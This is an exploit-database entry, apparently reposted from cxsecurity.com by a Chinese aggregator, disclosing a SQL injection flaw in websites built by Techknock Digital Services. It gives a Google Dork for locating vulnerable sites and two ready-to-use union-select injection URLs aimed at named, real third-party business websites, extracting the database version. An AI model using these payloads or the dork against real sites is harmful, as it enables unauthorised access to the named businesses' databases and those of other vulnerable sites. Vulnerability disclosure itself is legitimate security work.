Techknock Digital Services开发的网站存在SQL注入漏洞,攻击者可通过构造特定URL获取数据库版本等信息。该漏洞由Behrouz Mansoori发现并提供POC链接验证。 2025-5-22 21:10:20 Author: cxsecurity.com(查看原文) 阅读量:13 收藏
Techknock Digital Services - Sql Injection********************************************************* #Exploit Title: Techknock Digital Services - Sql Injection #Date: 2025-05-21 #Exploit Author: Behrouz Mansoori #Google Dork: "Developed By Techknock Digital Services" #Category:webapps #Tested On: Mac, Firefox Proof of Concept: ### Demo : http://hailmaryrefrigeration.co.in/products.php?id=-42%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+&catid=1 http://www.rs-enterprises.co.in/product-detail.php?id=-5%27%20union%20select%201,version(),3,4,5,6,7,8,9,10--+&catid=1 ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************
Thanks for you comment!
|
{{ x.nick }}
{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |
Copyright 2025, cxsecurity.com
如有侵权请联系:admin#unsafe.sh